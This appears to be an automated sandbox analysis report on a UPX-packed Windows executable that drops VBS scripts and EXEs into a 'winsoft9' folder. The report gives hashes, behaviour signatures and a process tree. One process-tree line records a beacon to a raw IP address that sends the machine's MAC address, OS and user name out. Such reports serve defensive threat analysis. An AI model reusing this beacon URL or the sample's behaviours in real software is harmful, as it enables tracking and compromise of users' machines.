Analysis

  • max time kernel
    68s
  • max time network
    23s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-03-2024 02:14

General

  • Target
    bd66fd42173eeccc30d90f045ee972a8.exe
  • Size
    854KB
  • MD5
    bd66fd42173eeccc30d90f045ee972a8
  • SHA1
    63ade2d8ee6db1c59262a7c7eeb31517e00b5240
  • SHA256
    49a8a1a713da6403155717c8a491fd600e48259fb68239726f067d5b092ac0c0
  • SHA512
    03a6a487e22355609c6cf50def5d5a42c55fc02fdf70bb800cc9b7a3071161031a453277341b2053b5b79f86db796617ab4de0d4329718ca1581fe45a3461366
  • SSDEEP
    24576:cutr5OUiMFgctewIbP9rEgqHudi0PjeDWS8MzXRrlVw/OIzwikys:cuX0ctewIbGl90PiDMMzXBlMCys

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bd66fd42173eeccc30d90f045ee972a8.exe
    "C:\Users\Admin\AppData\Local\Temp\bd66fd42173eeccc30d90f045ee972a8.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3720
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\3.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4584
      • C:\Program Files (x86)\winsoft9\t2.exe
        "C:\Program Files (x86)\winsoft9\t2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2936
    • C:\Program Files (x86)\winsoft9\test.exe
      "C:\Program Files (x86)\winsoft9\test.exe"
      2⤵
      • Executes dropped EXE
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=52-62-f0-8e-e7-3f&os=Microsoft Windows XP&flag=a354fded837b5bd49865c16aaef263fc&user=test
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3960 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3836
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3960 CREDAT:214018 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2104
    • C:\Program Files (x86)\winsoft9\bho.exe
      "C:\Program Files (x86)\winsoft9\bho.exe"
      2⤵
      • Executes dropped EXE
      PID:3320
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
      2⤵
      PID:3632
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
    PID:4144
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2432 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:4712

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Program Files (x86)\winsoft9\1.vbs
    Filesize: 155B
    MD5: e849e17e1406246a7735f6bd56c0746c
    SHA1: 71579dc34f462ba27527537fb721046b9a8ac828
    SHA256: f1ad4f5cd82f88506daf47972a4aa977bf6a9e2c789f06fa5fafb49d52613328
    SHA512: d7dfdb1f4c579557ca0530dd91a2c3b3a93f7f13d9b1190fea0f7e06ee23ef909980f7fcb0dd6ffdf4a15d5da4566084c507daa373e299e39721c3fdf08b9fe5

  • C:\Program Files (x86)\winsoft9\3.vbs
    Filesize: 366B
    MD5: f6335c3ecedc794942a63f4a035f188d
    SHA1: 77fef7feed8a3ab3e48eb9a47ab19e5f743aa29f
    SHA256: 7289a5e894693eb160fd0db3f93fe01ea4a00d1fa984a181ee417c54212390d0
    SHA512: 4a597baea20244689fd161599e6c0154d9029ab93a33fc333084307d5843a1e74a8ca8abdb7a65fa23e8d768505972b87e90ade0b7af36114190d2e72519bc46

  • C:\Program Files (x86)\winsoft9\bho.exe
    Filesize: 651KB
    MD5: bcd485ad4617e520ae9db51ba5a90b1d
    SHA1: a86af8eda57760475e50d42aa0b1dcecbd74a9bb
    SHA256: 931ceae29f72d9c5a7baab8e5d6ef921512441cfc16f87195cbfb56b37cafbc4
    SHA512: 1eb76e51db2f8bc89799df20267abd08975f3d093080faa63e967273d909f74e266c787906f4d90f91e8628953cf19330bb0a515da74879c474bf989baea394d

  • C:\Program Files (x86)\winsoft9\t2.exe
    Filesize: 12.9MB
    MD5: 947cf950f7493b8e4734b4a4d9449091
    SHA1: 8247627ab34a79b9af9f0eca01a4c785a9ded157
    SHA256: 1008e5a37b2a1b0dfe828be4f5309b0876862ab4f9027512726c3d2d9c87f0a7
    SHA512: c7da8acd82e588b19b6102ccff8bd05eb0da945299f9c3bf42784d60fadee1b583032f0d5763a7dc10ea76cf3425abe129f863c19251aa2957baf7f38076afd1

  • C:\Program Files (x86)\winsoft9\test.exe
    Filesize: 9.5MB
    MD5: 8cb79ffeaa6c27e8c14a78c2cf80a5e0
    SHA1: 8f538702c7fb48e20158907efeec611910321abf
    SHA256: 6d762eabc51ae76deab8411d2f154fa85bc1c81c91fa3055138844dff4b5ef66
    SHA512: e60a6fc9b6d3eca03619943abf21c7ac53b4ce3375dd62278235c6a277f3537ea46e4a3c0205695bad86c92ed1b8699e5383d6f4d7bb89357f9eb059a4a14112

  • C:\Program Files (x86)\winsoft9\test.exe
    Filesize: 10.1MB
    MD5: 656eaa3fa4a1b212f64c9e5a361ea8f0
    SHA1: 419cbdc9bbc63645160c0ecd61888e85f4947af3
    SHA256: 215d05c61edead9c731814f5c21f0c8ca2d4c5f83df4d174019a2ea1eed27433
    SHA512: fc3ed717a1ef57aff407d2a03bcb55c9d4179a1bb7c1eb5cf1d52f192df4347f51624f9143d112ed6f271aeb6bd5d65ebb23e2b8ef373b9b80a286a528783f99

  • C:\Program Files (x86)\winsoft9\test.exe
    Filesize: 9.7MB
    MD5: fb213be987ae517efe85cd760b5bd182
    SHA1: 2f66f741c5d655244582b15611f42c90153001da
    SHA256: 2251701c54cf76459887da6dacb2a20b6beaf70d78acdb8d02fbd4f115d8d94a
    SHA512: f648b2158f318e07927bc6490391baa88f7e36cb66db0d304c26ee90dfea27db296e29c938b8e778348018986c3b1d5d9b149748df07e3f990310c5422fcb188

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2E5EA63-DE83-11EE-ABF1-5262F08EE73F}.dat
    Filesize: 4KB
    MD5: 4ecadba76640529569464a1aef6b7305
    SHA1: 6672976267b9141957a6cb5ba290b9191aeb7af8
    SHA256: 6b16a802b52ec47a25f4d2c96bd7e831f697b70a4881061488dedc246723cdf1
    SHA512: d4b2bb4031f1f3fc015b99d77070de25e98c3eeb8a9baf6eb3d32742130d47018bd3a98b7afd3aba9d7f4979323c2c9a4b777f4407dcc9d57a2e7903696fc232

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E304EA30-DE83-11EE-ABF1-5262F08EE73F}.dat
    Filesize: 5KB
    MD5: 77fd25e7ca2f36177fc9fe72ac8c6d82
    SHA1: eef62555e6c74a55496670c8ec68a7cc0b2cfba5
    SHA256: 59df263f80335da3923cb858f352d0880b46ed3eb9fb2ec14473ac21969fbaaf
    SHA512: 2cb59ac7f8362511451f15dc047edc4789d416ab0c89041f8f1c6deb5e30ff63ba70b13c379fc6c010de611c9f918aa6e94d9bb1ef2d2cc5779d7e87a7bcaf55

  • C:\b.txt
    Filesize: 52B
    MD5: 081a7b88bad7ab23d6f8e08d7036510d
    SHA1: 0d4ef96a343f8e9ae6658823234c325d1e04cec3
    SHA256: 7693bdd3f1c506e3b263c0661a8c2f6741b0c7d2833579e82ec2ca8086fb8857
    SHA512: 592463fbec4d8578a59b5d86207ad2716754fd9fc2ec194b8a232a5b13d200f0d5c2ff693daa0ad7a7c99dd3d5ec319d54b7f89dc6cc5033c4bd84072ada79f4

  • memory/2108-110-0x0000000000400000-0x0000000000423000-memory.dmp
    Filesize: 140KB

  • memory/2108-39-0x0000000000400000-0x0000000000423000-memory.dmp
    Filesize: 140KB

  • memory/2936-21-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize: 128KB

  • memory/2936-131-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize: 128KB